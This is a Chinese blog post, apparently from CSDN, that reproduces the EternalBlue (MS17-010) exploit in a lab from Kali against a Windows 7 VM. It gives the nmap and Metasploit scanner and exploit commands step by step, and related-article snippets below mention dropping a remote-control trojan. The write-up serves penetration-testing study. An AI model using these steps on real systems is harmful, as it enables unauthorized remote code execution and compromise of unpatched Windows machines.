永恒之蓝漏洞复现

已于 2024-08-06 09:15:34 修改
阅读量380 收藏 4
点赞数 6
CC 4.0 BY-SA版权
文章标签: 运维 安全架构 windows linux
于 2024-08-03 17:26:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57379923/article/details/140893831

一、基本信息

攻击机:kali IP:192.168.100.60

靶机:Windows7 IP:192.168.100.20

二、攻击过程

使用 NMAP 进行主机发现,找到目标机 IP 地址

 

nmap -sP 192.168.100.0/24


   
 

 

 

启动 MSF
 

 

msfconsole


   
 

 

 

查找永恒之蓝漏洞模块
 

 

search ms17-010


   
 

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,探测目标主机是否存在 MS17-010 漏洞。
 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击代码,一般两者配合使用,前者先扫描,若是显示有漏洞,再进行攻击。
 

使用模块进行扫描
 

 

use auxiliary/scanner/smb/smb_ms17_010


   
 

设置检测目标主机并开始检测
 

 

set rhosts 192.168.100.20
run


   
 

 

 

使用 ms17-010 攻击模块,对靶机进行攻击
 

 

use exploit/windows/smb/ms17_010_eternalblue


   
 

设置目标机、监听机,并开始攻击
 

 

set rhosts 192.168.100.20
set lhost 192.168.100.60
run


   
 

 

 

攻击成功
 

 

 

 

 

 

作 者:PeiyuJue
 链 接: https://peiyu.serv00.net/2024/07/06/永恒之蓝复现/
 来 源:Aaron的博客
 版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!
 


                

        

    

    
  



    



                



	

		

			

				
					
Kali--永恒之蓝漏洞复现

				
			

			

				

					f1245179815的博客
				

				

					10-24
					
					1184
					
				

			

		

		

			
				
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。

			
		

	



                

            
              



	

		

			

				
					
永恒之蓝漏洞检测工具

				
			

			

				

					10-10
				

			

		

		

			
				
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。

			
		

	



              


  
              

                


	

		

			

				
					
永恒之蓝漏洞

				
			

			

				

					2402_83519154的博客
				

				

					09-03
					
					530
					
				

			

		

		

			
				
msf6 auxiliary(scanner/smb/smb_ms17_010) >  show options  //查看模块可配置选项(设置带有yes的且current setting为空的设置)msf6 >  use auxiliary/scanner/smb/smb_ms17_010  //使用ms17010的扫描功能(也可以输入序号1)msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit   //发起扫描。ifconfig 或者 ip add。

			
		

	





	

		

			

				
					
二、永恒之蓝漏洞

				
			

			

				

					qq_59235193的博客
				

				

					02-02
					
					457
					
				

			

		

		

			
				
本次测试主要是利用永恒之蓝漏洞windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝漏洞利用原理。永恒之蓝Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

			
		

	



		

			
		



	

		

			

				
					
永恒之蓝漏洞扫描工具官方版

				
			

			

				

					08-06
				

			

		

		

			
				
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍

			
		

	





	

		

			

				
					
永恒之蓝漏洞复现(详细版)

				
			

			

				

					Zqinglele的博客
				

				

					03-20
					
					5791
					
				

			

		

		

			
				
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。

			
		

	





	

		

			

				
					
Windows 2008永恒之蓝漏洞利用与后渗透测试详解

					
最新发布

				
			

			

				

					09-23
				

			

		

		

			
				
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...

			
		

	





	

		

			

				
					
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验

				
			

			

				

					2401_84297796的博客
				

				

					05-03
					
					1693
					
				

			

		

		

			
				
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。

			
		

	





	

		

			

				
					
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)

				
			

			

				

					2401_84297796的博客
				

				

					05-03
					
					1092
					
				

			

		

		

			
				
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。

			
		

	





	

		

			

				
					
永恒之蓝漏洞演示

				
			

			

				

					12-22
				

			

		

		

			
				
利用kali linuxwindows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂

			
		

	





	

		

			

				
					
局域网内批量扫描永恒之蓝(勒索病毒)漏洞脚本

				
			

			

				

					05-17
				

			

		

		

			
				
依据腾讯发布的勒索病毒漏洞扫描工具,编写了一个简单的批量扫描脚本,可以扫描C类网所有电脑是否存在漏洞需要修复,可根据实际需要修改IP地址范围。扫描结果以txt文件保存。
运行scannsa.bat,依次输入:
1.C类IP地址段,例如:192.168.1
2.起始IP,例如:2(默认为1)
3.结束IP,例如:254(默认为255)

			
		

	





	

		

			

				
					
网络安全必学渗透测试流程

				
			

			

				

					qq_44005305的博客
				

				

					02-12
					
					724
					
				

			

		

		

			
				
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。

			
		

	





	

		

			

				
					
永恒之蓝漏洞属于什么漏洞/永恒之蓝漏洞检测工具-零基础攻防笔记

				
			

			

				

					程序员三九的博客
				

				

					06-24
					
					609
					
				

			

		

		

			
				
项目三 永恒之蓝漏洞利用.docx,永恒之蓝漏洞利用 本次测试主要是利用永恒之蓝漏洞windows7进行控制利用,掌握Metasploit工具的使用,知道永恒之蓝漏洞利用原理。

			
		

	





	

		

			

				
					
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法

				
			

			

				

					记录学习
				

				

					06-21
					
					6708
					
				

			

		

		

			
				
msf永恒之蓝漏洞复现过程以及修复建议

			
		

	





	

		

			

				
					
MS17-010(永恒之蓝)漏洞复现和分析

				
			

			

				

					daoshiwa的博客
				

				

					09-21
					
					3816
					
				

			

		

		

			
				
永恒之蓝

			
		

	





	

		

			

				
					
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河

				
			

			

				

					m0_59302403的博客
				

				

					03-22
					
					4143
					
				

			

		

		

			
				
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。

			
		

	





	

		

			

				
					
永恒之蓝漏洞复现(包括常见问题处理)和修复方案

				
			

			

				

					sinat_27757177的博客
				

				

					10-17
					
					5458
					
				

			

		

		

			
				
永恒之蓝漏洞复现(包括常见问题处理)和修复方案

			
		

	





	

		

			

				
					
永恒之蓝漏洞复现(ms17-010)

					
热门推荐

				
			

			

				

					渗透之路,攻防之间皆学问
				

				

					01-20
					
					2万+
					
				

			

		

		

			
				
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
Aaron_Jㅤ

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值